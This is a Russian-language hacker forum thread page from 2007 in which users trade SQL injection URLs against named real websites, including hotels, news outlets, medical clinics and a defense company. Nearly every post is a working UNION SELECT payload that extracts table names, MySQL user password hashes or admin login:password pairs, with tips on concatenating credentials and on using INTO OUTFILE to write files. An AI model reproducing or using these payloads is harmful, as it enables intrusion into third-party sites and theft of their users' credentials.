ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #621  
Старый 28.02.2007, 02:21
Аватар для Underwit
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921

Репутация: 469
По умолчанию

http://www.travellatvia.lv/8/90/0/ru/?main=5&reg=1'
 
Ответить с цитированием

  #622  
Старый 28.02.2007, 04:26
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

через раз отвечало мне internal error, так что не доделал:
Цитата:
__http://www.frogview.com/show.php?file=-981+union+select+convert(table_name+using+latin1), 2,3,4+from+INFORMATION_SCHEMA.TABLES/*

чего-то колонки в Customers не вытянул
Цитата:
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+3,1/*
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Последний раз редактировалось Thanat0z; 28.02.2007 в 05:06..
 
Ответить с цитированием

  #623  
Старый 28.02.2007, 14:55
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://timesreporter.com/index.php?ID=-9+union+select+1,version(),3,4,5,6,7,8,9/*&r=2
=\
 
Ответить с цитированием

  #624  
Старый 28.02.2007, 15:30
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Моя первая скуль...
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0

P.S. Если кто-нибудь доведет её до ума, я буду благодарен...

Последний раз редактировалось Iceangel_; 28.02.2007 в 15:36..
 
Ответить с цитированием

  #625  
Старый 28.02.2007, 15:33
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.italyhotel.ru/index.php?d=stadt&id=-29+union+select+1,2,3,4,5,6,7,8,9,password,11,user +from+mysql.user/*
 
Ответить с цитированием

  #626  
Старый 28.02.2007, 17:17
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,VERSION(),4,5/*

http://www.trud.ru/issue/news.php?id=-2215+union+select+1,2,5,4,5,6,7/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+u sers/*

http://www.whenhamstersattack.com/news.php?id=-4+union+select+1,2,3,4,5,6,7/*

http://www.mostrud.ru/news.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.us er/*

http://www.footballfoundation.com/news.php?id=-581+union+select+1,2,3,4,5,6,7+from+mysql.user/*

http://www.gamersinfo.net/content/news.php?id=-168+union+select+1,2,3,4,5,6,7,8,9+from+user/*

http://fishres.ru/news/news.php?id=-4471+union+select+1,2,3,4,5,6,7,8,9/*

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 +from+mysql.user/*

http://www.akdgs.ru/news.php?id=-49+union+select+1,2,3,4,5,6/*

http://www.marchespublics.net/actualite/news.php?id=-635+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18/*

http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*

http://www.abajour.ru/news.php?id=-19+union+select+1,2,3,4,5/*

http://www.liverpoolfc.ru/news.php?id=-859+union+select+1,2,3,4,5,6+from+users/*
 
Ответить с цитированием

  #627  
Старый 28.02.2007, 18:09
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*

Into Outfile можно применить!
 
Ответить с цитированием

  #628  
Старый 28.02.2007, 19:14
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.glimm-med.de/clinics.php?id=-1+union+select+1,id,3,4,login,password,7,8,9,10+fr om+users/*

__http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,2,3,4,5/*

__http://www.androlog.ru/?module=publications&id=-1+union+select+1,user(),3,4,5/*

Последний раз редактировалось Grey; 28.02.2007 в 19:23..
 
Ответить с цитированием

  #629  
Старый 28.02.2007, 19:27
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*
Юзай concat(user,char(58),password)
или вместо char(58) ставь 0x3a. Это всего навсего ":" , но так удобнее
__________________
..
 
Ответить с цитированием

  #630  
Старый 28.02.2007, 21:49
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.tectonic.co.za/view.php?id=-1+union+select+concat(username,0x3a,password),2+from+users/*
в title


Код:
http://www.mp3search.by/artist.php?id=-1+union+select+1,concat(login,0x3a,password)+from+admin/*
байан делетед

Последний раз редактировалось n1†R0x; 28.02.2007 в 23:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ